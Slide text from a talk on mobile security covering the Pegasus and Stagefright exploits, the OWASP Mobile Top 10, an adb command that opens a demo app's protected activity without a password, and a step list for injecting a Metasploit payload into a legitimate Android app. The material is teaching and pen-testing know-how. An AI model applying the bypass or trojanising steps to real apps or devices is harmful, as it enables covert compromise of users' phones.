Mobile [hacking, pen-test, malware]

Ahmad Muammar OSCE, OSCP, eMAPT

Ahmad Muammar WKFreelance IT Security Consultant/Pen-Tester

Certification: OSCE, OSCP, eMAPT

Founder echo.or.id (2003), ubuntulinux.or.id (2005), idsecconf.org (2008)

http://me.ammar.web.id

me@ammar.web.id

@y3dips

Why Mobile?

Image taken from: http://www.wired.com/gadgetlab/2012/02/meet-the-asus-padfone-the-phone-thats-a-tablet-thats-a-notebook/

Mobile phone

Image taken from: www.astanos.ch/img/apple-android-windows-mobile-blackberry-logo.png

Mobile Hacking

Sophisticated, targeted mobile attack against high-value targets on iOS - Pegasus Malware by NGO

Sophisticated, targeted mobile attack against high-value targets on iOS - Pegasus Malware by NGO

Pegasus ExploitCVE-2016-4655: Information leak in Kernel – A kernel base mapping vulnerability that leaks information to the attacker allowing him to calculate the kernel’s location in memory.

CVE-2016-4656: Kernel Memory corruption leads to Jailbreak – 32 and 64 bit iOS kernel-level vulnerabilities that allow the attacker to silently jailbreak the device and install surveillance software.

CVE-2016-4657: Memory Corruption in Webkit – A vulnerability in the Safari WebKit that allows the attacker to compromise the device when the user clicks on a link.

Pegasus is developed by an American-owned NSO Group in Israel, which specialises in zero-days, obfuscation, encryption and kernel level exploitation.

The attack sequence, boiled down, is a classic phishing scheme: send text message, open web browser, load page, exploit vulnerabilities, install persistent software to gather information.

Pegasus Exploit

StageFright

"Stagefright" is the nickname given to a potential exploit.

vulnerability in libStageFright mechanism which helps Android process video files.

http://www.androidcentral.com/stagefright

Mr. Robot eps2.6_succ3ss0r.p12

Mobile Pen-Test

M1. Weak Server Side Controls

OWASP Top 10

M2. Insecure Data Storage

M3. Insufficient Transport Layer

Protection M4. Unintended Data

Leakage

M5. Poor Authorization and Authentication

M6. Broken Cryptography

M7. Client Side Injection

M8. Security Decisions via Untrusted Inputs

M9. Improper Session Handling

M10. Lack of Binary Protections

OWASP Mobile top 10 2014 - https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks

Mobile Pen-test

What pen-tester “normally" doing is static analysis, dynamic analysis

Static simply recompile, reversing, decrypt

Dynamic simply run the apps and see apps behaviour, logs, db updates, etc.

SecureBox Apps

“SecureBox: protect all your text using Login for every account.”

SecureBox Apps Pen-test

Decompile Apps Using Apktool

First, see AndroidManifest.xml !

Decompile SecureBox Apps

SecureBox AndroidManifest

Decompile Apps Using Apktool

See AndroidManifest.xml if nothing wrong continue…

We can try to access Activity Secure using Activity Manager tool

SecureBox Bypass$adb shell

root@android:/#am start -a android.intent.action.Secure -n inc.ammar.securebox/.Secure

\o/ w00t no passwd needed!

Mobile Malware

Inject valid Apps with MSFCreate Metasploit APK

Decompile Metasploit APK using Apktool

Decompile Legitimate applications using Apktool

Copy smali folder from Metasploit to smali folder in legitimate applications

Find “correct place” to inject and invoke Metasploit project

Recompile Applications

Sign and verify.

SurviveAnything that must truly remain private should not reside on the mobile device; Keep it on the server.

Design mobile client and the server following security best practice.

Design and implement all apps under the assumption that the users device will be lost or stolen.

Include mobile security Pen-test/Audit in software development life cycle.

Image takern from: http://sciencetoybox.com/images/Procedures/Raising_hands.jpg

Mobile [Hacking, Pen-test, Malware]

Thank you ;-)

Ahmad Muammar OSCE, OSCP, eMAPT